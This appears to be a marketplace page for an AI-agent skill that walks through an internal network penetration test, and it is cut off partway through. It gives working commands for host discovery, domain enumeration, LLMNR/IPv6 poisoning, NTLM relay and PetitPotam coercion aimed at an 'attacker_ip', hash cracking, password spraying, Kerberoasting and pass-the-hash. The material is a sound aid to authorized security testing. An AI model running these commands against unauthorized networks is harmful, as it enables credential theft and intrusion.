acquiring-disk-image-w…
Create forensically sound bit-for-bit disk images using dd and dcfldd while preserving evidence integrity through
Execute an internal network penetration test simulating an insider threat or post-breach attacker to identify
$ npx -y skills add Mikaru0Mystic/sectinel --skill conducting-internal-network-penetration-test --agent claude-codeHow it fires
How this skill gets triggered: by you, by Claude, or both.
/conducting-internal-network-penetration-testContext preview
The summary Claude sees to decide when to auto-load this skill.
Execute an internal network penetration test simulating an insider threat or post-breach attacker to identify
name: conducting-internal-network-penetration-test description: Execute an internal network penetration test simulating an insider threat or post-breach attacker to identify lateral movement paths, privilege escalation vectors, and sensitive data exposure within the corporate network. domain: cybersecurity subdomain: penetration-testing tags: - internal-pentest - lateral-movement - privilege-escalation - Responder - Impacket - assumed-breach - network-security version: '1.0' author: mahipal license: Apache-2.0 d3fend_techniques: - Application Protocol Command Analysis - Network Isolation - Network Traffic Analysis - Client-server Payload Profiling - Network Traffic Community Deviation nist_csf: - ID.RA-01 - ID.RA-06 - GV.OV-02 - DE.AE-07
An internal network penetration test simulates an attacker who has already gained access to the internal network or a malicious insider. The tester operates from an "assumed breach" position — typically a standard domain workstation or network jack — and attempts lateral movement, privilege escalation, credential harvesting, and data exfiltration to determine the blast radius of a compromised endpoint.
> **Legal Notice:** This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
# Identify your own network position
ip addr show
ip route show
cat /etc/resolv.conf
# ARP scan for live hosts on local subnet
arp-scan --localnet --interface eth0
# Nmap host discovery across internal ranges
nmap -sn 10.0.0.0/8 --exclude 10.0.0.1 -oG internal_hosts.gnmap
nmap -sn 172.16.0.0/12 -oG internal_hosts_172.gnmap
nmap -sn 192.168.0.0/16 -oG internal_hosts_192.gnmap
# Extract live hosts
grep "Status: Up" internal_hosts.gnmap | awk '{print $2}' > live_hosts.txt
# Port scan live hosts — top 1000 ports
nmap -sS -sV -T4 -iL live_hosts.txt -oA internal_tcp_scan
# Service-specific scans
nmap -p 445 --open -iL live_hosts.txt -oG smb_hosts.gnmap
nmap -p 3389 --open -iL live_hosts.txt -oG rdp_hosts.gnmap
nmap -p 22 --open -iL live_hosts.txt -oG ssh_hosts.gnmap
nmap -p 1433,3306,5432,1521,27017 --open -iL live_hosts.txt -oG db_hosts.gnmap# Enumerate domain information with domain credentials # Using CrackMapExec / NetExec netexec smb 10.0.0.0/24 -u 'testuser' -p 'Password123' --shares netexec smb 10.0.0.0/24 -u 'testuser' -p 'Password123' --users netexec smb 10.0.0.0/24 -u 'testuser' -p 'Password123' --groups # LDAP enumeration ldapsearch -x -H ldap://10.0.0.5 -D "testuser@corp.local" -w "Password123" \ -b "DC=corp,DC=local" "(objectClass=user)" sAMAccountName memberOf # Enumerate Group Policy Objects netexec smb 10.0.0.5 -u 'testuser' -p 'Password123' --gpp-passwords netexec smb 10.0.0.5 -u 'testuser' -p 'Password123' --lsa # BloodHound data collection bloodhound-python -u 'testuser' -p 'Password123' -d corp.local -ns 10.0.0.5 -c all # Import JSON files into BloodHound GUI for attack path analysis # Enum4linux-ng for legacy enumeration enum4linux-ng -A 10.0.0.5 -u 'testuser' -p 'Password123'
# SMB share enumeration smbclient -L //10.0.0.10 -U 'testuser%Password123' smbmap -H 10.0.0.10 -u 'testuser' -p 'Password123' -R # SNMP enumeration snmpwalk -v2c -c public 10.0.0.1 # DNS zone transfer attempt dig axfr corp.local @10.0.0.5 # NFS enumeration showmount -e 10.0.0.15 # MSSQL enumeration impacket-mssqlclient 'corp.local/testuser:Password123@10.0.0.20' -windows-auth
# Responder — LLMNR/NBT-NS/mDNS poisoning sudo responder -I eth0 -dwPv # Capture NTLMv2 hashes from Responder logs cat /usr/share/responder/logs/NTLMv2-*.txt # mitm6 — IPv6 DNS takeover sudo mitm6 -d corp.local # ntlmrelayx — relay captured credentials impacket-ntlmrelayx -tf smb_targets.txt -smb2support -socks # PetitPotam — coerce NTLM authentication python3 PetitPotam.py -u 'testuser' -p 'Password123' -d corp.local \ attacker_ip 10.0.0.5
# Crack captured NTLMv2 hashes hashcat -m 5600 ntlmv2_hashes.txt /usr/share/wordlists/rockyou.txt \ -r /usr/share/hashcat/rules/best64.rule # Password spraying (careful with lockout policies) netexec smb 10.0.0.5 -u users.txt -p 'Spring2025!' --no-bruteforce netexec smb 10.0.0.5 -u users.txt -p 'Company2025!' --no-bruteforce # Kerberoasting — target service accounts impacket-GetUserSPNs 'corp.local/testuser:Password123' -dc-ip 10.0.0.5 \ -outputfile kerberoast_hashes.txt hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt # AS-REP Roasting — target accounts without pre-auth impacket-GetNPUsers 'corp.local/' -usersfile users.txt -dc-ip 10.0.0.5 \ -outputfile asrep_hashes.txt hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt
# Pass-the-Hash with Impacket impacket-psexec 'corp.local/admin@10.0.0.30' -hashes :aad3b435b51404eeaad3b435b51404ee:e02
Open-source security arsenal for AI coding agents: 784 cybersecurity skills, scanner integrations, and a security MCP for Claude Code, Cursor, opencode, Gemini CLI, Cline, and any agentskills.io agent. Mapped to OWASP, MITRE ATT&CK, NIST CSF, D3FEND, ATLAS.
Repo: Mikaru0Mystic/sectinel
Create forensically sound bit-for-bit disk images using dd and dcfldd while preserving evidence integrity through
Detect dangerous ACL misconfigurations in Active Directory using ldap3 to identify GenericAll, WriteDACL, and
Perform static analysis of Android APK malware samples using apktool for decompilation, jadx for Java source
Parses API Gateway access logs (AWS API Gateway, Kong, Nginx) to detect BOLA/IDOR attacks, rate limit bypass,
Analyze advanced persistent threat (APT) group techniques using MITRE ATT&CK Navigator to create layered heatmaps
Queries Azure Monitor activity logs and sign-in logs via azure-monitor-query to detect suspicious administrative